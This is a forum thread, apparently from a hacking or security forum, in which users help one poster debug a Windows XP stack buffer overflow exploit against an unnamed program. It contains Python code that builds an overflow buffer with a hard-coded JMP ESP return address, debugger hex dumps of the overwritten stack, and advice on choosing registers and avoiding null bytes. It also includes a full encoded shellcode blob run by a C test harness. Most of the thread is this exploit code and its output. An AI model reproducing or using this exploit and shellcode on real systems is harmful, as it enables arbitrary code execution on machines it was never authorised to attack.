can u please tell me why jmp ECX wont work on XP If not what else should I do
I didn't know what the OP might mean by that just tested my way and ran, but what is jump ECX and whats the differents from linux and window(just area i can google)Also a Jump ECX will not work with Windows XP.
From xp sp3 to sp2 the only think that should change is from 00400000 to another 00400000 if you used the code I posted. I would like to find out about this jmp ecx as i'm not to fimaly about that and proable won't beable to help you in that regard.If you can Please try it on some xp sp2 machine and tell me where I m going wrong.
I'm new to this compared to the old fellow here, but is it eip or ebp?The first NOP's I mean the beginnng of the shellcodes are being pointed by ECX
minus by 4 untill the eip doesn't have \x90 in it, and then add a pionter/jmp to the nops at the start of the shellcode(if using ollydbg look at the bottom left)which machine u tried as I find after 524 bytes is eip is overwritten.
those address(#7 post) look like the heap not stack, look higher0022E020
can u please tell me why jmp ECX wont work on XP If not what else should I do
I've got a working exploit for your source.
It is quite simple.
You went into the right direction also with your layout of the memory. But you should give your buffer a closer look. Check the registers again. Maybe you shouldn't jump to ECX but some other register.
Tiocfaidh ár lá
yes ESP is pointing to the the buffer.eip overwritten at 524 and esp points at 528th byte.I use the following code to test.I find the total available space for shelocode is 932 bytes (after esp).But after running the following code I find EIP overwritten by a stack address 0022EC3D .I have pasted the part of hex dump.I have even tested with few othe jmp esp address but still not getting result
buffer = "A" * 524 #junk data
buffer += '\x5D\x38\x82\x7C' #jmp ESP address eip
buffer += "B" * 4 #esp nops
buffer += "C" * 928 #shellcode +nop
buffer += '\r\n'
print buffer
hex dump
------------------------------------------
0022EC1D 41 41 41 41 41 41 41 41 AAAAAAAA
0022EC25 41 41 41 41 41 41 41 41 AAAAAAAA
0022EC2D 41 41 41 41 41 41 41 41 AAAAAAAA
0022EC35 41 41 41 41 41 41 41 5D AAAAAAA]
0022EC3D 38 82 7C 42 42 42 42 43 8‚|BBBBC ----address pointed by eip
0022EC45 43 43 43 43 43 43 43 43 CCCCCCCC
0022EC4D 43 43 43 43 43 43 43 43 CCCCCCCC
0022EC55 43 43 43 43 43 43 43 43 CCCCCCCC
0022EC5D 43 43 43 43 43 43 43 43 CCCCCCCC
I think eip should contain adress of jmp esp.I have tried to use with shellcode also but not getting dsired results.Am I going wrong somewhere.Can u please suggest me how I should proceed further.
buffer = "A" * 524 #junk dataBut after running the following code I find EIP overwritten by a stack address 0022EC3D
buffer = "A" * 524 #junk data
buffer += '\x5D\x38\x82\x7C' #jmp ESP address eip
buffer += "B" * 4 #esp nops
buffer += "C" * 928 #shellcode +nop
buffer += '\r\n'
print buffer
hex dump
------------------------------------------
0022EC1D 41 41 41 41 41 41 41 41 AAAAAAAA
0022EC25 41 41 41 41 41 41 41 41 AAAAAAAA
0022EC2D 41 41 41 41 41 41 41 41 AAAAAAAA
0022EC35 41 41 41 41 41 41 41 5D AAAAAAA]
0022EC3D 38 82 7C 42 42 42 42 43 8‚|BBBBC ----address pointed by eip
0022EC45 43 43 43 43 43 43 43 43 CCCCCCCC
0022EC4D 43 43 43 43 43 43 43 43 CCCCCCCC
0022EC55 43 43 43 43 43 43 43 43 CCCCCCCC
0022EC5D 43 43 43 43 43 43 43 43 CCCCCCCC
buffer += '\x5D\x38\x82\x7C' #jmp ESP address eip
buffer += "\x45\xec\x22\x00"
buffer += "C" * 928 #shellcode +nop
buffer += '\r\n'
Try to use a different JMP ESP
Tiocfaidh ár lá
Regarding "zero bytes":
In the C programming language, and in many other programming languages, a string is a sequence of characters followed by a terminating null character. So for instance, if you had the string, "dog", it would be the following four bytes:
1: The ASCII code for d
2: The ASCII code for o
3: The ASCII code for g
4: The terminating null character (which is simply all bits zero)
If you were to copy this string, for instance by using the "strcpy" function, then "strcpy" will stop copying when it encounters the terminating null character. This is where the problem lies. If your shell code contains a zero byte, then all string functions will stop reading at the zero byte. So if your shell code contains a zero byte, you need to improvise somehow to get rid of it (that's of course assuming that your shell code will be processed by a string-processing routine).
Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
I have tsted the shellcode using the following.It works as it should.I dont think a null byte is thr.
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
char shellcode[]=
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x85"
"\x3f\x2a\xbd\x83\xeb\xfc\xe2\xf4\x79\x55\xc1\xf0\ x6d\xc6\xd5\x42"
"\x7a\x5f\xa1\xd1\xa1\x1b\xa1\xf8\xb9\xb4\x56\xb8\ xfd\x3e\xc5\x36"
"\xca\x27\xa1\xe2\xa5\x3e\xc1\xf4\x0e\x0b\xa1\xbc\ x6b\x0e\xea\x24"
"\x29\xbb\xea\xc9\x82\xfe\xe0\xb0\x84\xfd\xc1\x49\ xbe\x6b\x0e\x95"
"\xf0\xda\xa1\xe2\xa1\x3e\xc1\xdb\x0e\x33\x61\x36\ xda\x23\x2b\x56"
"\x86\x13\xa1\x34\xe9\x1b\x36\xdc\x46\x0e\xf1\xd9\ x0e\x7c\x1a\x36"
"\xc5\x33\xa1\xcd\x99\x92\xa1\xfd\x8d\x61\x42\x33\ xcb\x31\xc6\xed"
"\x7a\xe9\x4c\xee\xe3\x57\x19\x8f\xed\x48\x59\x8f\ xda\x6b\xd5\x6d"
"\xed\xf4\xc7\x41\xbe\x6f\xd5\x6b\xda\xb6\xcf\xdb\ x04\xd2\x22\xbf"
"\xd0\x55\x28\x42\x55\x57\xf3\xb4\x70\x92\x7d\x42\ x53\x6c\x79\xee"
"\xd6\x6c\x69\xee\xc6\x6c\xd5\x6d\xe3\x57\x3b\xe1\ xe3\x6c\xa3\x5c"
"\x10\x57\x8e\xa7\xf5\xf8\x7d\x42\x53\x55\x3a\xec\ xd0\xc0\xfa\xd5"
"\x21\x92\x04\x54\xd2\xc0\xfc\xee\xd0\xc0\xfa\xd5\ x60\x76\xac\xf4"
"\xd2\xc0\xfc\xed\xd1\x6b\x7f\x42\x55\xac\x42\x5a\ xfc\xf9\x53\xea"
"\x7a\xe9\x7f\x42\x55\x59\x40\xd9\xe3\x57\x49\xd0\ x0c\xda\x40\xed"
"\xdc\x16\xe6\x34\x62\x55\x6e\x34\x67\x0e\xea\x4e\ x2f\xc1\x68\x90"
"\x7b\x7d\x06\x2e\x08\x45\x12\x16\x2e\x94\x42\xcf\ x7b\x8c\x3c\x42"
"\xf0\x7b\xd5\x6b\xde\x68\x78\xec\xd4\x6e\x40\xbc\ xd4\x6e\x7f\xec"
"\x7a\xef\x42\x10\x5c\x3a\xe4\xee\x7a\xe9\x40\x42\ x7a\x08\xd5\x6d"
"\x0e\x68\xd6\x3e\x41\x5b\xd5\x6b\xd7\xc0\xfa\xd5\ x75\xb5\x2e\xe2"
"\xd6\xc0\xfc\x42\x55\x3f\x2a\xbd";
int main ()
{
int *ret;
ret=(int *)&ret+2;
printf("Shellcode Length is : %d",strlen(shellcode));
(*ret)=(int)shellcode;
return 0;
}
As there is no badchar I don't know why it shouldn't work.
Could you please tell us what the exact problem is atm?
Tiocfaidh ár lá
Originally Posted by KMDave
Try to use a different JMP ESP
Hi I still have the problem with other jmp esp address.I am not able to find whats wrong.I dont think I have done any wrong calculation regarding offsets and other things.Can u pls guide me furthur.
Posting Permissions